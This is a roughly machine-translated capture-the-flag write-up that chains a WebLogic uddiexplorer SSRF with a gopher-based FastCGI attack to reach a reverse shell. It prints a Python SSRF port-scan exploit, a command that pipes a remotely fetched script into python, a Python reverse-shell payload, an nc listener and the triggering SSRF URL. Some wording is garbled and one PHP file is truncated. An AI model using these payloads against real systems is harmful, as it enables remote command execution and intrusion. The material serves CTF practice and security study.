Three white hats-looking for you from the stars-Phase I, three white hats-looking for you from the stars-Phase I challenge introduction
I lost you from the stars. I may need to use everything I have to use to retrieve you. After two sentences are compiled, I can't make it. okay, I admit that this is the first issue of penetration.
Challenges
Http://0761e975dda0c67cb.jie.sangebaimao.com/
0x01 information collection
The opening address is a dz argument. It seems that it is not so fun, or the latest version.
Since it is completely transparent, I feel like I am offering a big poster, "Let's look at it "!(The dictionary is related)
Soon get the related information (excluding the original contents and faces of dz)
/info.php/uddiexplorer/
One is phpinfo () information, which is useful.
/opt/discuz/info.php
The other is weblogic.
Result: Baidu"Uddiexplorer vulnerability"You can now knowWeblogic uddiexplorerExistSSRFVulnerability.
This transparent relationship lies inSSRF!!!
Exploit vulnerabilities
SSRF is not only engaged in the internal network, but also combined with the docker of three white hats. 127.0.0.1 is King!
Baidu"SearchPublicRegistries ssrf vulnerability exp"
Get http://www.tuicool.com/articles/UjaqIbz
Get a notebook and modify it for use !!!
Port overview. py
#!/usr/bin/env python # -*- coding: utf-8 -*- import reimport requestsdef scan(ip_str): url = 'http://0761e975dda0c67cb.jie.sangebaimao.com' ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',) for port in ports: exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port) try: response = requests.get(exp_url, timeout=15, verify=False) re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content) re_sult2 = re.findall('but could not connect',response.content) if len(re_sult1)!=0 and len(re_sult2)==0: print ip_str+':'+port except Exception, e: passif __name__ == "__main__": scan('127.0.0.1')
Ports 9000, 80, 3306, 7001, and are successfully cracked.
SSRF + GOPHER has always been awesome, and it has recently become increasingly popular.
Baidu ~~
Rr chicory's latest article Do edevil Things with gopher: //
0x03 attack FastCGI
Generally, FastCGI is bound to Port 127.0.0.1, but the use of Gopher + SSRF can perfectly attack FastCGI to execute arbitrary commands.
0x06 references
Remote Exploitation of PHP FastCGI
Command line
Fcgi_exp
Transportation
nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"php -f gopher.php
Save payloadto x.txt
The anti-bot shell black technology and bash anti-bot are ineffective ~~
Then urlencode uses payload to generate ssrf. php
Shell. py
import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("yourip",9999)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/bash","-i"]);
Gopher. php
");?>
The ssrf. php file is successfully generated.
Reverse shell
VPS operation
nc -lvv 9999
Use SSRF
http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php
Anti-renewal successful ~~~
GETFLAG
Find it by yourself